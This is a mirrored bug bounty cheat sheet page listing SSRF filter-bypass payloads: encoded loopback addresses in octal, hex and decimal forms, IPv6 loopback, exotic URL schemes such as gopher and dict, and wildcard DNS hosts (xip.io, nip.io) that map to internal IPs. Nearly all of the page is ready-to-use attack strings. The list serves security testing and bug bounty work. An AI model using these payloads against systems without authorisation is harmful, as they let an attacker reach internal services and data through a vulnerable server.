mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-29 14:30:19 +00:00
51 lines
567 B
Markdown
51 lines
567 B
Markdown
## SSRF
|
|
|
|
```
|
|
http://0177.1/
|
|
```
|
|
|
|
```
|
|
http://0x7f.1/
|
|
```
|
|
|
|
```
|
|
https://520968996
|
|
```
|
|
|
|
_Note:_ The latter can be calculated using http://www.subnetmask.info/
|
|
|
|
**Exotic Handlers**
|
|
|
|
```
|
|
gopher://, dict://, php://, jar://, tftp://
|
|
```
|
|
|
|
**IPv6**
|
|
|
|
```
|
|
http://[::1]
|
|
```
|
|
|
|
```
|
|
http://[::]
|
|
```
|
|
|
|
**Wildcard DNS**
|
|
|
|
```
|
|
10.0.0.1.xip.io
|
|
www.10.0.0.1.xip.io
|
|
mysite.10.0.0.1.xip.io
|
|
foo.bar.10.0.0.1.xip.io
|
|
```
|
|
_Link:_ http://xip.io
|
|
|
|
```
|
|
10.0.0.1.nip.io
|
|
app.10.0.0.1.nip.io
|
|
customer1.app.10.0.0.1.nip.io
|
|
customer2.app.10.0.0.1.nip.io
|
|
otherapp.10.0.0.1.nip.io
|
|
```
|
|
|
|
_Link:_ http://nip.io
|